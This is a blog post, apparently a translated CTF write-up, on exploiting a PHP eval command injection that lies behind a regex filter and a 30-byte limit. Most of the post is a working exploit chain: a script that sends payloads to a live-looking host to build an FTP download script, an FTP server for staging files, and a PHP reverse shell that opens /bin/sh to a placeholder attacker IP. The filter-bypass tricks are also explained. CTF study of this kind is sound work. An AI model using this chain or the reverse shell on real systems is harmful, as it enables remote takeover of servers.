Command injection exploited with an exp script

The challenge code is as follows:

<?php
// Connect to localhost:8888 to get the flag
if($_GET['👉🏻'] == '👌🏻') die(phpinfo());
$_ = $_GET['⁣'];
highlight_file(__FILE__);

if(preg_match("/[\w]{4,}/is",$_) || preg_match("/\[|\"|'|\||\^|~|\./is",$_)) // I block whatever I feel like blocking 👯
     die("🙅"); // 4cm is too much
eval(substr($_,0,30));


There is no visible parameter name, so it is evidently an invisible character; capturing the request reveals it: %e2%81%a3

The black magic is to get past the filter with runs of at most three \w characters; on top of that the input is limited to 30 characters and several symbols are filtered.

phpinfo shows that shell_exec is not disabled, so this is presumably command execution.

Found that the following works (the backslash keeps every \w run under four characters, and sh strips it before running echo):

sh -c "ec\ho 1"
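As an added illustration (not code from the original post), the following Python reproduces the challenge's two preg_match() checks and the 30-byte cut, so the reader can see why echo is rejected while ec\ho reaches eval(), and why the exploit later has to be fed in many short requests. It assumes PHP's default ASCII-only \w (no /u modifier); the three command fragments it checks are copied from the exp.php on this page.

```python
import re

# Reproduction (not the challenge's own code) of the two filters in the challenge.
# PHP's \w without the /u modifier is ASCII [A-Za-z0-9_], hence re.ASCII.
WORD_RUN = re.compile(r"\w{4,}", re.ASCII)   # preg_match("/[\w]{4,}/is")
BAD_CHARS = re.compile(r"[\[\"'|^~.]")        # preg_match("/\[|\"|'|\||\^|~|\./is")
MAX_LEN = 30                                  # eval(substr($_, 0, 30))

def filter_verdict(payload: str) -> str:
    """'blocked' if either regex matches, otherwise 'eval' (input reaches eval())."""
    if WORD_RUN.search(payload) or BAD_CHARS.search(payload):
        return "blocked"
    return "eval"

def evaluated_prefix(payload: str) -> str:
    """substr($_, 0, 30): only the first 30 bytes are evaluated (ASCII input assumed)."""
    return payload[:MAX_LEN]

def shell_unescape(word: str) -> str:
    """What sh does with an unquoted backslash: ec\\ho becomes echo. The
    four-letter run only exists after the PHP filter has already passed."""
    return re.sub(r"\\(.)", r"\1", word)

def longest_word_run(payload: str) -> int:
    """Longest [A-Za-z0-9_] run in the input; the filter fires at 4."""
    return max((len(m) for m in re.findall(r"\w+", payload, re.ASCII)), default=0)

# Three command fragments copied from the page's exp.php, wrapped as fuck1() does: `cmd`;
PAGE_FRAGMENTS = [r"ec\ho cd /tmp >/tmp/0", r"php -f /tmp/x", r"rm /tmp/0"]

def check_fragments(fragments=PAGE_FRAGMENTS):
    """(fragment, ok): ok when the wrapped payload passes the filter and fits in 30 bytes."""
    out = []
    for cmd in fragments:
        wrapped = f"`{cmd}`;"
        ok = filter_verdict(wrapped) == "eval" and len(wrapped) <= MAX_LEN
        out.append((cmd, ok))
    return out

if __name__ == "__main__":
    for cmd, ok in check_fragments():
        print("PASS" if ok else "FAIL", cmd)
```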


The IP is written in decimal form (the dot is filtered).

A bash -i reverse shell failed, so PHP is used for the reverse shell instead.

Scripts

ip2dec.sh

# usage: ip2dec 10.0.0.1 -> 167772161 (bash; uses a here-string)
ip2dec () {
    local a b c d ip=$@
    IFS=. read -r a b c d <<< "$ip"
    printf '%d\n' "$((a * 256 ** 3 + b * 256 ** 2 + c * 256 + d))"
}

ftpd.py

# Minimal FTP server serving /root/ to user a/a, so the target can fetch the PHP shell
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
authorizer = DummyAuthorizer()
authorizer.add_user('a', 'a', '/root/', perm='elradfmw')
handler = FTPHandler
handler.authorizer = authorizer
server = FTPServer(('0.0.0.0', 21), handler)
server.serve_forever()

ftpdown.sh

# non-interactive ftp: log in as a/a and fetch x (the PHP reverse shell)
ftp -niv<<!
open [ip] [port]
user a a
mget x
bye
!

php_shell.php

<?php $sock=fsockopen("xxx.xxx.xxx.xxx",23333);exec("/bin/sh -i <&3 >&3 2>&3");

exp.php

<?php
error_reporting(0);

// Wrap a shell command in backticks so the 30-byte eval() runs it through shell_exec
function fuck1($u){
    fuck("`{$u}`;");
}
// Send the payload as the invisible GET parameter (%e2%81%a3) and print what follows
// the highlight_file() output, i.e. the command's own output
function fuck($u){
    $u = urlencode($u);
    $a = file_get_contents("http://l4w.pw/%F0%9F%A4%94/?%e2%81%a3={$u}");
    $x = explode("</code>", $a);
    echo $x[1];
}
// Build the ftp script /tmp/0 one line per request. echo is written as ec\ho and words
// such as open/user/mget are split with a backslash because any run of four or more
// word characters is rejected; the IP and port go on their own lines so that each
// request stays within 30 bytes.
fuck1("ec\ho cd /tmp >/tmp/0");
fuck1("ec\ho ftp \\\\\\ >>/tmp/0");
fuck1("ec\ho -niv\\<\\<! >>/tmp/0");
fuck1("ec\ho o\\pen \\\\\\ >>/tmp/0");
fuck1("ec\ho my\\\\\\ >>/tmp/0");
fuck1("ec\ho ip\\\\\\ >>/tmp/0");
fuck1("ec\ho ip\\\\\\ >>/tmp/0");
fuck1("ec\ho ip port >>/tmp/0");
fuck1("ec\ho u\\ser a a >>/tmp/0");
fuck1("ec\ho m\\get \\\\\\ >>/tmp/0");
fuck1("ec\ho x >>/tmp/0");
fuck1("ec\ho bye >>/tmp/0");
fuck1("ec\ho ! >>/tmp/0");
// Run the downloaded PHP reverse shell, then remove the ftp script
fuck1("php -f /tmp/x");
fuck1("rm /tmp/0");


Reference: https://www.virzz.com/2018/02/17/a_funny_command_injection.html


posted @ 2019-03-08 23:44 by 一世安然L, 466 views, 0 comments